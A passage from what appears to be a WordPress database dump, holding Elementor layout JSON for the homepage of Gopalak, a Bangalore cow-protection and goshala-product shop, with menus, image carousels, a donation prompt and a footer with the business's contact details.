here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12247,2009,'_elementor_page_assets','a:0:{}'),(12255,2011,'_elementor_edit_mode','builder'),(12256,2011,'_elementor_template_type','wp-page'),(12257,2011,'_elementor_version','3.7.8'),(12258,2011,'_wp_page_template','elementor_canvas'),(12259,2011,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\